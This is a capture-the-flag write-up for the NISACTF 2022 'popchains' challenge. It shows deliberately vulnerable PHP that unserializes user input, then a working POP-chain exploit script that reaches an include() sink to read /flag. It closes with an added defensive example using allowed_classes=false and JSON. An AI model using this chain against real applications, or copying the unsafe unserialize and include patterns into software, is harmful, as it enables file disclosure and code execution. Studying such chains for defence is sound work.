[NISACTF 2022]popchains
The challenge is as follows:
<?php
echo 'Happy New Year~ MAKE A WISH<br>';
if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }
    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}
class Try_Work_Hard{
    protected $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }
    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/
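Approach:
First, find the vulnerable point, then work backwards from it:
1. The append function passes its argument to include(), so it is a file inclusion sink: whatever file it is given gets included and executed.
2. Reaching append requires triggering __invoke, which happens when an object is called as a function.
3. For Try_Work_Hard to be called as a function, __get in Make_a_Change must be triggered; __get calls whatever is stored in $this->effort.
4. Triggering __get requires __toString in Road_is_Long to be called, because it reads $this->string->page, a property that does not exist on Make_a_Change.
5. Calling __toString requires the regex match in __wakeup to run, with $this->page being a Road_is_Long object: preg_match treats $this->page as a string.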
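<?php
/***************************pop your 2022*****************************/
class Road_is_Long{
    public $page;
    public $string;
}
class Try_Work_Hard{
    // Path that append() will pass to include()
    protected $var="/flag";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
class Make_a_Change{
    public $effort;
}
$a=new Road_is_Long();
// Step 5: page is an object, so preg_match in __wakeup calls __toString
$a->page=$a;
// Step 4: __toString reads ->page on Make_a_Change, which calls __get
$a->string=new Make_a_Change();
// Steps 3 and 2: __get calls effort as a function, which calls __invoke
$a->string->effort=new Try_Work_Hard();
// protected $var serializes with NUL bytes, hence urlencode
echo urlencode(serialize($a));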
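
The chain only starts because unserialize() is allowed to instantiate application classes from the wish parameter. The following is an added example, not part of the original writeup or the challenge, showing two ways to read that parameter without running any magic method; Gadget, read_wish_no_objects and read_wish_json are hypothetical names, and the payload is constructed inline.

```php
<?php
// Added example, not the challenge's code. All names here are hypothetical.

// Constructed stand-in for any class with magic methods, e.g. Road_is_Long::__wakeup.
class Gadget {
    public static $fired = 0;
    public $page = 'index.php';
    public function __wakeup() { self::$fired++; }
}

// Option 1: keep PHP serialization but refuse to instantiate classes.
// Objects in the payload become __PHP_Incomplete_Class, so no __wakeup,
// __toString, __get or __invoke of an application class can run.
function read_wish_no_objects(string $raw) {
    $value = @unserialize($raw, ['allowed_classes' => false]);
    if ($value === false && $raw !== serialize(false)) {
        return null;                                  // malformed input
    }
    $hasObject = false;
    $walk = [$value];
    while ($walk) {                                   // reject objects at any depth
        $item = array_pop($walk);
        if (is_object($item) || $item instanceof __PHP_Incomplete_Class) {
            $hasObject = true;
            break;
        }
        if (is_array($item)) {
            foreach ($item as $child) { $walk[] = $child; }
        }
    }
    return $hasObject ? null : $value;
}

// Option 2: use a data-only format; JSON cannot describe PHP objects at all.
function read_wish_json(string $raw) {
    $value = json_decode($raw, true, 8);              // arrays only, depth capped
    return (is_array($value) || is_string($value)) ? $value : null;
}

$payload = serialize(new Gadget());                   // constructed sample input
@unserialize($payload);                               // what the challenge does
echo "plain unserialize, __wakeup calls: ", Gadget::$fired, "\n";

Gadget::$fired = 0;
var_dump(read_wish_no_objects($payload));
echo "allowed_classes=false, __wakeup calls: ", Gadget::$fired, "\n";
var_dump(read_wish_no_objects(serialize(['wish' => 'peace'])));
var_dump(read_wish_json('{"wish":"peace"}'));
```

The include($value) sink in Try_Work_Hard is a separate weakness: even with deserialization locked down, a path passed to include() should come from a fixed allowlist rather than from object state.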

